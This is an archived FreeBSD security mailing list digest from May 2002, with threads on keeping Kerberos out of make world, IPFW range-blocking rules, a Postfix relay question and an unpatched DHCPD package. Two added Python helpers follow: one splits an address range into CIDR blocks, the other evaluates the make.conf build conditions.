> next make world.
>
> MAKE_KERBEROS4= false
> MAKE_KERBEROS5= false

I suggest you comment these out. These bits are only built if you define MAKE_KERBEROS4=yes and MAKE_KERBEROS5=yes in /etc/make.conf.

Cheers,
--
Jacques A. Vidrine                              http://www.nectar.cc/
NTT/Verio SME        .      FreeBSD UNIX      .      Heimdal Kerberos
jvidrine@verio.net   .   nectar@FreeBSD.org   .         nectar@kth.se

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Fri May 10 16:50:49 2002
Delivered-To: freebsd-security@freebsd.org
Received: from alfanett.no (mail1.alfanett.no [195.134.40.22]) by hub.freebsd.org (Postfix) with ESMTP id A35BF37B409; Fri, 10 May 2002 16:50:42 -0700 (PDT)
Received: from goppus.overalt.no (kunde1323.alfanett.no [195.134.38.54]) by alfanett.no (8.9.3/8.9.3/alfaNETT1.0) with ESMTP id BAA23639; Sat, 11 May 2002 01:50:36 +0200
Content-Type: text/plain; charset="iso-8859-1"
From: Marius Sorteberg
Reply-To: marius@overalt.no
To: "Jacques A. Vidrine"
Subject: Re: How to remove Kerberos from base install
Date: Sat, 11 May 2002 01:51:44 +0200
X-Mailer: KMail [version 1.4]
Cc: freebsd-security@FreeBSD.ORG
References: <20020510093809.GA368@overalt.no> <20020510162535.GA52239@madman.nectar.cc>
In-Reply-To: <20020510162535.GA52239@madman.nectar.cc>
MIME-Version: 1.0
Content-Transfer-Encoding: 8bit
Message-Id: <200205110151.44504.marius@overalt.no>
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID:
List-Archive: (Web Archive)
List-Help: (List Instructions)
List-Subscribe:
List-Unsubscribe:
X-Loop: FreeBSD.org

Thanks for your reply.

> > How do I remove KerberosIV and Heimdal from my base install?
> > I know it's OK to delete all files related to the old Kerberos apps, but
> > how do I know which files to delete?
>
> I have two suggestions:
>
> (1) Have a look at what is installed by
>         cd /usr/src/kerberosIV && make install
>         cd /usr/src/kerberos5 && make install
>

OK! I will try that tomorrow.

> (2) Look at the contents of the krb4 and krb5 dists on the CD-ROM.
>

OK! I'll compare that too.

> > I have included this in my /etc/make.conf, so it won't be built during
> > the next make world.
> >
> > MAKE_KERBEROS4= false
> > MAKE_KERBEROS5= false
>
> I suggest you comment these out. These bits are only built if you
> define MAKE_KERBEROS4=yes and MAKE_KERBEROS5=yes in /etc/make.conf.

Are you sure? I thought that the "#NOCRYPT= true" in the /etc/defaults/make.conf, made the build world make all the src/crypto apps (including Kerberos).
I thought that when not comment out the "NOCRYPT= true", but add "MAKE_KERBEROS(5)4= false", it would build OpenSSL and OpenSSH, but not KerberosIV and Heimdal.

I'll report back to the list after doing some tests.

--
Marius Sorteberg

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Fri May 10 22:23: 7 2002
Delivered-To: freebsd-security@freebsd.org
Received: from math.teaser.net (math.teaser.net [213.91.2.4]) by hub.freebsd.org (Postfix) with ESMTP id AAD1A37B40A for ; Fri, 10 May 2002 22:23:03 -0700 (PDT)
Received: from roadrunner.rominet.net (ATuileries-109-1-2-47.abo.wanadoo.fr [80.13.122.47]) by math.teaser.net (Postfix) with ESMTP id 347C06C85A; Sat, 11 May 2002 07:23:02 +0200 (CEST)
Received: by roadrunner.rominet.net (Postfix, from userid 1000) id 652CB8167; Sat, 11 May 2002 07:23:00 +0200 (CEST)
Date: Sat, 11 May 2002 07:23:00 +0200
From: Alain Thivillon
To: Naughty Taz
Cc: freebsd-security@freebsd.org
Subject: Re: IPFW and IP/mask mathematics
Message-ID: <20020511052300.GA22841@roadrunner.rominet.net>
References: <001e01c1f79e$78612390$626a003e@homepc>
Mime-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1
Content-Disposition: inline
Content-Transfer-Encoding: 8bit
In-Reply-To: <001e01c1f79e$78612390$626a003e@homepc>
User-Agent: Mutt/1.3.24i
X-Organization: Rominet Networks Inc.
X-Operating-System: FreeBSD 4.5-STABLE
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID:
List-Archive: (Web Archive)
List-Help: (List Instructions)
List-Subscribe:
List-Unsubscribe:
X-Loop: FreeBSD.org

Naughty Taz écrivait (wrote) :

> Hi all,
>
> I've been trying to get a ruleset for IPFW but was unable to figure out
> how to do it :(
> I'd appreciate it if someone can reply with the right ruleset for the
> following:
>
> 1) allow traffic from 0.0.0.0 - XXX.128.0.0
> 2) block traffic from XXX.128.0.0 - XXX.146.159.255

ipfw add deny all from xxx.128.0.0/12 to any
ipfw add deny all from xxx.144.0.0/15 to any
ipfw add deny all from xxx.146.0.0/16 to any
ipfw add allow all from any to any

--
Nom d'un chat de nom d'un chat !

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Sat May 11 13:38: 5 2002
Delivered-To: freebsd-security@freebsd.org
Received: from hotmail.com (f102.pav2.hotmail.com [64.4.37.102]) by hub.freebsd.org (Postfix) with ESMTP id 5CE2D37B408 for ; Sat, 11 May 2002 13:38:02 -0700 (PDT)
Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC; Sat, 11 May 2002 13:38:02 -0700
Received: from 202.41.224.36 by pv2fd.pav2.hotmail.msn.com with HTTP; Sat, 11 May 2002 20:38:01 GMT
X-Originating-IP: [202.41.224.36]
From: "Sunil Sunder Raj"
To: freebsd-security@freebsd.org
Subject: POSTFIX RELAY SERVER ON FREEBSD
Date: Sun, 12 May 2002 02:08:01 +0530
Mime-Version: 1.0
Content-Type: text/plain; format=flowed
Message-ID:
X-OriginalArrivalTime: 11 May 2002 20:38:02.0296 (UTC) FILETIME=[BECADB80:01C1F92B]
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID:
List-Archive: (Web Archive)
List-Help: (List Instructions)
List-Subscribe:
List-Unsubscribe:
X-Loop: FreeBSD.org

Hi,
Could some one help me out on POSTFIX RELAY SERVER ON FREEBSD.
I am almost through but some small hiccups.

Could someone having an experience help me out.

THANKS IN ADVANCE.
SUNIL SUNDER RAJ

_________________________________________________________________
Chat with friends online, try MSN Messenger: http://messenger.msn.com

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Sat May 11 14: 8: 8 2002
Delivered-To: freebsd-security@freebsd.org
Received: from rwcrmhc51.attbi.com (rwcrmhc51.attbi.com [204.127.198.38]) by hub.freebsd.org (Postfix) with ESMTP id 8C39737B404; Sat, 11 May 2002 14:08:00 -0700 (PDT)
Received: from blossom.cjclark.org ([12.234.91.48]) by rwcrmhc51.attbi.com (InterMail vM.4.01.03.27 201-229-121-127-20010626) with ESMTP id <20020511210800.WLTD10136.rwcrmhc51.attbi.com@blossom.cjclark.org>; Sat, 11 May 2002 21:08:00 +0000
Received: (from cjc@localhost) by blossom.cjclark.org (8.11.6/8.11.6) id g4BL7xL09378; Sat, 11 May 2002 14:07:59 -0700 (PDT) (envelope-from cjc)
Date: Sat, 11 May 2002 14:07:59 -0700
From: "Crist J. Clark"
To: Marius Sorteberg
Cc: "Jacques A. Vidrine" , freebsd-security@FreeBSD.org
Subject: Re: How to remove Kerberos from base install
Message-ID: <20020511140759.B2824@blossom.cjclark.org>
References: <20020510093809.GA368@overalt.no> <20020510162535.GA52239@madman.nectar.cc> <200205110151.44504.marius@overalt.no>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <200205110151.44504.marius@overalt.no>; from marius@overalt.no on Sat, May 11, 2002 at 01:51:44AM +0200
X-URL: http://people.freebsd.org/~cjc/
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID:
List-Archive: (Web Archive)
List-Help: (List Instructions)
List-Subscribe:
List-Unsubscribe:
X-Loop: FreeBSD.org

On Sat, May 11, 2002 at 01:51:44AM +0200, Marius Sorteberg wrote:

[snip]

> > > I have included this in my /etc/make.conf, so it won't be built during
> > > the next make world.
> > >
> > > MAKE_KERBEROS4= false
> > > MAKE_KERBEROS5= false
> >
> > I suggest you comment these out. These bits are only built if you
> > define MAKE_KERBEROS4=yes and MAKE_KERBEROS5=yes in /etc/make.conf.
>
> Are you sure? I thought that the "#NOCRYPT= true" in the
> /etc/defaults/make.conf, made the build world make all the src/crypto apps
> (including Kerberos).
> I thought that when not comment out the "NOCRYPT= true", but add
> "MAKE_KERBEROS(5)4= false", it would build OpenSSL and OpenSSH, but not
> KerberosIV and Heimdal.

No, don't define 'MAKE_KERBEROS[45]' at all. Here is the makefile logic in src/Makefile.inc,

  .if exists(${.CURDIR}/kerberosIV) && exists(${.CURDIR}/crypto) && \
      !defined(NOCRYPT) && !defined(NO_OPENSSL) && defined(MAKE_KERBEROS4)
  SUBDIR+= kerberosIV
  .endif
  .if exists(${.CURDIR}/kerberos5) && exists(${.CURDIR}/crypto) && \
      !defined(NOCRYPT) && !defined(NO_OPENSSL) && defined(MAKE_KERBEROS5)
  SUBDIR+= kerberos5
  .endif

--
Crist J. Clark                     |     cjclark@alum.mit.edu
                                   |     cjclark@jhu.edu
http://people.freebsd.org/~cjc/    |     cjc@freebsd.org

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Sat May 11 15:27:53 2002
Delivered-To: freebsd-security@freebsd.org
Received: from obsecurity.dyndns.org (adsl-63-207-60-43.dsl.lsan03.pacbell.net [63.207.60.43]) by hub.freebsd.org (Postfix) with ESMTP id 490D937B405 for ; Sat, 11 May 2002 15:27:46 -0700 (PDT)
Received: by obsecurity.dyndns.org (Postfix, from userid 1000) id 9941D66DC8; Sat, 11 May 2002 15:27:45 -0700 (PDT)
Date: Sat, 11 May 2002 15:27:45 -0700
From: Kris Kennaway
To: Sunil Sunder Raj
Cc: freebsd-security@freebsd.org
Subject: Re: POSTFIX RELAY SERVER ON FREEBSD
Message-ID: <20020511152745.A59844@xor.obsecurity.org>
References:
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5.1i
In-Reply-To: ; from unixtools@hotmail.com on Sun, May 12, 2002 at 02:08:01AM +0530
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID:
List-Archive: (Web Archive)
List-Help: (List Instructions)
List-Subscribe:
List-Unsubscribe:
X-Loop: FreeBSD.org

On Sun, May 12, 2002 at 02:08:01AM +0530, Sunil Sunder Raj wrote:
> Hi,
> Could some one help me out on POSTFIX RELAY SERVER ON FREEBSD.
> I am almost through but some small hiccups.
>
> Could someone having an experience help me out.

COULD YOU PLEASE BE A BIT LESS SPECIFIC ABOUT YOUR QUESTION AND POST IT TO SOME MORE OFF-TOPIC MAILING LISTS WHILE YOU'RE AT IT. THANKS.

Kris

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Sat May 11 15:34:17 2002
Delivered-To: freebsd-security@freebsd.org
Received: from mgw1-out.MEIway.com (mgw1.meiway.com [212.73.210.75]) by hub.freebsd.org (Postfix) with ESMTP id EA5B237B404 for ; Sat, 11 May 2002 15:34:12 -0700 (PDT)
Received: from VirusGate.MEIway.com (virus-gate.meiway.com [212.73.210.91]) by mgw1-out.MEIway.com (Postfix Relay Hub) with ESMTP id 103BB38B9F for ; Sun, 12 May 2002 00:34:11 +0200 (CEST)
Received: from localhost (localhost.meiway.com [127.0.0.1]) by VirusGate.MEIway.com (Postfix) with SMTP id 29C645D005 for ; Sun, 12 May 2002 00:34:17 +0200 (CEST)
Received: from mail.Go2France.com (ms1.meiway.com [212.73.210.73]) by VirusGate.MEIway.com (Postfix) with ESMTP id C35AD5D001 for ; Sun, 12 May 2002 00:34:16 +0200 (CEST)
Received: from LenConrad.Go2France.com [66.64.14.18] by mail.Go2France.com with ESMTP (SMTPD32-6.06) id AC886ACE01E0; Sun, 12 May 2002 00:34:48 +0200
Message-Id: <5.1.0.14.2.20020511173155.028dc008@mail.Go2France.com>
X-Sender: LConrad@Go2France.com@mail.Go2France.com
X-Mailer: QUALCOMM Windows Eudora Version 5.1
Date: Sat, 11 May 2002 17:34:06 -0500
To: freebsd-security@freebsd.org
From: Len Conrad
Subject: Re: POSTFIX RELAY SERVER ON FREEBSD
In-Reply-To:
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"; format=flowed
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID:
List-Archive: (Web Archive)
List-Help: (List Instructions)
List-Subscribe:
List-Unsubscribe:
X-Loop: FreeBSD.org

>Could some one help me out on POSTFIX RELAY SERVER ON FREEBSD.
>I am almost through but some small hiccups.
>
>Could someone having an experience help me out.

several 100 people have setup IMGate in my sig.

Just ask if you want the config files.

Len

www.menandmice.com/DNS-training : DNS Training
BIND8NT.MEIway.com : ISC BIND for NT4 & W2K
IMGate.MEIway.com : Build free, hi-perf, anti-abuse mail gateways

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Sat May 11 16: 2: 4 2002
Delivered-To: freebsd-security@freebsd.org
Received: from forum.lariat.org (forum.lariat.org [12.23.109.3]) by hub.freebsd.org (Postfix) with ESMTP id 38EA537B405 for ; Sat, 11 May 2002 16:02:02 -0700 (PDT)
Received: (from brett@localhost) by forum.lariat.org (8.9.3/8.9.3) id RAA15457 for security@freebsd.org; Sat, 11 May 2002 17:02:00 -0600 (MDT)
Date: Sat, 11 May 2002 17:02:00 -0600 (MDT)
From: Brett Glass
Message-Id: <200205112302.RAA15457@forum.lariat.org>
To: security@freebsd.org
Subject: DHCPD bug
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID:
List-Archive: (Web Archive)
List-Help: (List Instructions)
List-Subscribe:
List-Unsubscribe:
X-Loop: FreeBSD.org

There's a nasty bug in ISC's DHCPD -- a remote root hole -- that affects the versions that have been provided as ports and packages in recent releases. See

http://www.extremetech.com/article/0,3396,apn=2&s=1024&a=26709&ap=1,00.asp

for a description of the problem.

The version of the port that's online has been updated to close the hole, but the package hasn't -- which means that users installing FreeBSD who grab the daemon via /stand/sysinstall will find themselves vulnerable.

Also, no advisory has been issued.... One should be.

--Brett

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Sat May 11 18:38:14 2002
Delivered-To: freebsd-security@freebsd.org
Received: from gw.nectar.cc (gw.nectar.cc [208.42.49.153]) by hub.freebsd.org (Postfix) with ESMTP id 0012C37B406 for ; Sat, 11 May 2002 18:38:11 -0700 (PDT)
Received: from madman.nectar.cc (madman.nectar.cc [10.0.1.111]) by gw.nectar.cc (Postfix) with ESMTP id 634723C; Sat, 11 May 2002 20:38:11 -0500 (CDT)
Received: from madman.nectar.cc (localhost [IPv6:::1]) by madman.nectar.cc (8.12.3/8.11.6) with ESMTP id g4C1cBr7061480; Sat, 11 May 2002 20:38:11 -0500 (CDT) (envelope-from nectar@madman.nectar.cc)
Received: (from nectar@localhost) by madman.nectar.cc (8.12.3/8.12.3/Submit) id g4C1cAnd061479; Sat, 11 May 2002 20:38:10 -0500 (CDT)
Date: Sat, 11 May 2002 20:38:10 -0500
From: "Jacques A. Vidrine"
To: Brett Glass
Cc: security@freebsd.org
Subject: Re: DHCPD bug
Message-ID: <20020512013810.GA61469@madman.nectar.cc>
References: <200205112302.RAA15457@forum.lariat.org>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <200205112302.RAA15457@forum.lariat.org>
User-Agent: Mutt/1.3.28i
X-Url: http://www.nectar.cc/
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID:
List-Archive: (Web Archive)
List-Help: (List Instructions)
List-Subscribe:
List-Unsubscribe:
X-Loop: FreeBSD.org

On Sat, May 11, 2002 at 05:02:00PM -0600, Brett Glass wrote:
> Also, no advisory has been issued....
> One should be.

No advisory will be issued, but it will be included in the next `Security Notice' (coming Real Soon Now).

Cheers,
--
Jacques A. Vidrine                              http://www.nectar.cc/
NTT/Verio SME        .      FreeBSD UNIX      .      Heimdal Kerberos
jvidrine@verio.net   .   nectar@FreeBSD.org   .         nectar@kth.se

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
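
For the "IPFW and IP/mask mathematics" message earlier in this digest, an added example (not from any poster) that splits an inclusive address range into the exact CIDR blocks for ipfw deny rules, and reports what a hand-written list matches outside the range or leaves uncovered. The first octet 10 is a constructed stand-in for the elided XXX, and the function names are this example's own.

```python
import ipaddress


def cidr_cover(first, last):
    """Return the minimal list of networks matching exactly first..last inclusive."""
    lo, hi = ipaddress.IPv4Address(first), ipaddress.IPv4Address(last)
    if lo > hi:
        raise ValueError("range start is above range end")
    return list(ipaddress.summarize_address_range(lo, hi))


def deny_rules(first, last):
    """One ipfw deny rule per CIDR block, in the form used in the thread."""
    return [f"ipfw add deny all from {net} to any" for net in cidr_cover(first, last)]


def coverage_diff(candidates, first, last):
    """Compare a list of CIDR strings with the wanted range first..last.

    Returns (extra, missing): address ranges the candidates match outside the
    wanted range, and parts of the wanted range that no candidate matches.
    """
    lo = int(ipaddress.IPv4Address(first))
    hi = int(ipaddress.IPv4Address(last))
    # collapse_addresses merges overlaps, so the networks are disjoint and sorted.
    nets = sorted(ipaddress.collapse_addresses(
        ipaddress.ip_network(c) for c in candidates))
    extra, missing = [], []
    cursor = lo  # lowest wanted address not yet known to be covered
    for net in nets:
        n_lo, n_hi = int(net.network_address), int(net.broadcast_address)
        if n_lo < lo:
            extra.append((n_lo, min(n_hi, lo - 1)))
        if n_hi > hi:
            extra.append((max(n_lo, hi + 1), n_hi))
        if n_hi >= cursor and n_lo <= hi:
            if n_lo > cursor:
                missing.append((cursor, n_lo - 1))
            cursor = max(cursor, n_hi + 1)
    if cursor <= hi:
        missing.append((cursor, hi))

    def as_text(pair):
        return tuple(str(ipaddress.IPv4Address(x)) for x in pair)

    return [as_text(p) for p in extra], [as_text(p) for p in missing]


# Constructed input: 10 replaces the "XXX" octet that the thread leaves out.
RANGE = ("10.128.0.0", "10.146.159.255")
# The three prefixes from the reply in the thread, with the same substitution.
HAND_WRITTEN = ["10.128.0.0/12", "10.144.0.0/15", "10.146.0.0/16"]

if __name__ == "__main__":
    for rule in deny_rules(*RANGE):
        print(rule)
    extra, missing = coverage_diff(HAND_WRITTEN, *RANGE)
    print("matched outside the range:", extra)
    print("left uncovered:", missing)
```

Running the diff before loading a deny list shows whether a rounded-up prefix also blocks neighbouring addresses that were meant to stay reachable.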
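
For the make.conf exchange in the "How to remove Kerberos from base install" thread above, an added example (not FreeBSD's build code) that applies the defined()-based conditions quoted from src/Makefile.inc to make.conf text, showing that a value of false still counts as defined. The parser is a simplification that handles plain assignments only, all three source directories are assumed to exist, and the sample make.conf contents are constructed.

```python
import re

# NAME=, NAME?=, NAME+=, NAME:= and NAME!= all define NAME for make(1).
ASSIGN = re.compile(r"^\s*([A-Za-z_][A-Za-z0-9_.]*)\s*[?+:!]?=\s*(.*?)\s*$")
# Values people write when they mean "off"; defined() does not look at them.
NEGATIVE = {"false", "no", "off", "0"}


def assignments(make_conf_text):
    """Return (name, value) for each assignment, ignoring '#' comments."""
    found = []
    for line in make_conf_text.splitlines():
        match = ASSIGN.match(line.split("#", 1)[0])
        if match:
            found.append((match.group(1), match.group(2)))
    return found


def kerberos_subdirs(make_conf_text, cmdline_defines=(),
                     src_dirs=("kerberosIV", "kerberos5", "crypto")):
    """Evaluate the two .if blocks quoted in the thread; return the SUBDIRs added."""
    defined = {name for name, _ in assignments(make_conf_text)}
    defined.update(cmdline_defines)  # e.g. make -DMAKE_KERBEROS5
    crypto_ok = ("crypto" in src_dirs
                 and "NOCRYPT" not in defined
                 and "NO_OPENSSL" not in defined)
    subdirs = []
    if "kerberosIV" in src_dirs and crypto_ok and "MAKE_KERBEROS4" in defined:
        subdirs.append("kerberosIV")
    if "kerberos5" in src_dirs and crypto_ok and "MAKE_KERBEROS5" in defined:
        subdirs.append("kerberos5")
    return subdirs


def misleading_knobs(make_conf_text, knobs=("MAKE_KERBEROS4", "MAKE_KERBEROS5")):
    """Knobs given a negative-looking value that defined() still treats as set."""
    return [(name, value) for name, value in assignments(make_conf_text)
            if name in knobs and value.lower() in NEGATIVE]


# Constructed make.conf contents.
AS_POSTED = "MAKE_KERBEROS4= false\nMAKE_KERBEROS5= false\n#NOCRYPT= true\n"
COMMENTED_OUT = "#MAKE_KERBEROS4= false\n#MAKE_KERBEROS5= false\n"
NOCRYPT_SET = "NOCRYPT= true\nMAKE_KERBEROS5= yes\n"

if __name__ == "__main__":
    for label, text in (("as posted", AS_POSTED),
                        ("commented out", COMMENTED_OUT),
                        ("NOCRYPT set", NOCRYPT_SET)):
        print(label, "->", kerberos_subdirs(text), misleading_knobs(text))
```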